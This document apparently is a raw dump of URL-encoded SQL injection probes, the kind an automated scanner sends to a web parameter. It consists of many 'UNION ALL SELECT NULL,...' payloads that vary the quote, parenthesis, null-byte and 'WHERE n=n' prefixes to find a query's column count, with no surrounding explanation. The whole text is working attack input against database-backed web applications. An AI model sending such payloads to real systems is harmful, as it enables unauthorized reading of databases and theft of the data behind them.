1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%201923%3D1923%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%209199%3D9199%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%201961%3D1961%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%205562%3D5562%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%208246%3D8246%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%209813%3D9813%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%209341%3D9341%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%206604%3D6604%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%207834%3D7834%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%207268%3D7268%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%201392%3D1392%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%209277%3D9277%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%206948%3D6948%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%207789%3D7789%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%205249%3D5249%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%209372%3D9372%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%205304%3D5304%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%203772%3D3772%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%209382%3D9382%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%206355%3D6355%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%206866%3D6866%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%202742%3D2742%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%203512%3D3512%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%203083%3D3083%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%202318%3D2318%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%201361%3D1361%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%203672%3D3672%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%203771%3D3771%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%207339%3D7339%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%201503%3D1503%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%202109%3D2109%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%206552%3D6552%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%202383%3D2383%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%203846%3D3846%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%203777%3D3777%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%201231%3D1231%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 